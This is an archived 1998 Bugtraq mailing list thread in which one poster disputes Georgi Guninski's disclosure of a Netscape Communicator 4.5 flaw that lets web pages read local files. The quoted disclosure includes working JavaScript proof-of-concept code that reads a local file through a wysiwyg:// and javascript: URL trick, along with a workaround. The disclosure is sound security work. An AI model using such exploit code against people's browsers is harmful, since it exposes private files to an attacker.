Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Netscape Communicator 4.5 can read local files

From: BillL () METAINFO COM (Bill Lavalette)
Date: Mon, 23 Nov 1998 11:31:52 -0800

Hi -
this appears to be no different then typing c:\ in the location of any
browser  hardly a security hole in my opinion the test site did not
prove that this is a potential or current problem.

Bill


-----Original Message-----
From:  Georgi Guninski [SMTP:guninski () HOTMAIL COM]
Sent:  Monday, November 23, 1998 10:37 AM
To:    BUGTRAQ () netspace org
Subject:       Netscape Communicator 4.5 can read local files

There is a bug in Netscape Communicator 4.5 for Windows 95 and 4.05 for
WinNT 4.0
(probably others) which allows reading files from the user's computer.
It is not necessary the file name to be known, because directories may
be browsed.
The contents of the file may be sent to an arbitrary host. In order this
to work, you need both Java and Javascript
enabled. The bug may be exploited by email message.

Demonstration is available at:
http://www.geocities.com/ResearchTriangle/1711/b6.html

Workaround: Disable Javascript or Java.


The Javascript code is:

sl=window.open("wysiwyg://1/file:///C|/");
sl2=sl.window.open();
sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your
file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new
java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) &&
(i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";

Regards,
Georgi Guninski
http://www.geocities.com/ResearchTriangle/1711



______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
Previous By Date Next
Previous By Thread Next

Current thread: